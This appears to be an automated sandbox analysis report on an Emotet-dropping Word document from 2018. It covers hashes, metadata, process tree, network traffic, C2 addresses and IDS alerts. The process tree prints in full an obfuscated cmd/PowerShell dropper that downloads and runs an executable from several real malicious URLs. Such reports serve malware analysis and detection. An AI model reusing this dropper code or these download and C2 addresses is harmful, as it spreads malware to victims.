File name: | 549803480e0cbacb9b267a3f9935f05551d32a2fa5b647103094c8eaab265294 |
Full analysis: | https://app.any.run/tasks/db83b606-201a-4ce4-a84f-19cf6064d590 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 09:12:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 6E23FA3C2C3DC88CEA89F9330857D63E |
SHA1: | 0CD7ED40F4806912C9CA8B5031DC268E48C2D7A4 |
SHA256: | 549803480E0CBACB9B267A3F9935F05551D32A2FA5B647103094C8EAAB265294 |
SSDEEP: | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 04:03:00 |
ModifyDate: | 2018:12:14 04:03:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\549803480e0cbacb9b267a3f9935f05551d32a2fa5b647103094c8eaab265294.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4088 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2648 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2816 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3220 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3496 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2612 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3492 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | 934.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3360 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6BCA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E1F4FFB.wmf | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF6B66C1.wmf | — | |
MD5:— | SHA256:— | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2DJ3Y7JT0Q94B9KT7L03.temp | — | |
MD5:— | SHA256:— | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FFDDA778140572C37C6C1B9E1A88C58B | SHA256:478279FBD54E6D1EE6C21D74755708B0B3AD34CCC4069C872C81C9A3A4BF25D2 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B101F37EA9381CFA34A9F979C13ABD5B | SHA256:B82510E270480CBA5A000547AF125F034A78A013F6B18A1E63932D80FD7945FB | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50F811C0.wmf | wmf | |
MD5:B7DB5ABE717258093E64730332846469 | SHA256:1DAA9EC858F21746B1890CDD36132B80487090235D0758E2404C457ED6EF5F89 | |||
3492 | 934.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:1DBF8DD1593C49989527543036A58CDE | SHA256:C9BA0C6EA2D8B5B9DB22F090BC926D3F2D8FCEFDAB57D49353FE05579200C1BF | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247c35.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3496 | powershell.exe | GET | 301 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 297 b | malicious |
3984 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3984 | archivesymbol.exe | GET | — | 189.154.39.153:443 | http://189.154.39.153:443/ | MX | — | — | malicious |
3984 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
3984 | archivesymbol.exe | GET | 200 | 86.98.66.88:990 | http://86.98.66.88:990/ | AE | binary | 132 b | suspicious |
3496 | powershell.exe | GET | 200 | 212.227.94.120:80 | http://cipriati.co.uk/w9/ | DE | executable | 120 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3496 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
3984 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
3984 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 189.154.39.153:443 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 86.98.66.88:990 | — | Emirates Telecommunications Corporation | AE | suspicious |
Domain | IP | Reputation |
---|---|---|
cipriati.co.uk |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3496 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3496 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3496 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3496 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3496 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3984 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3984 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |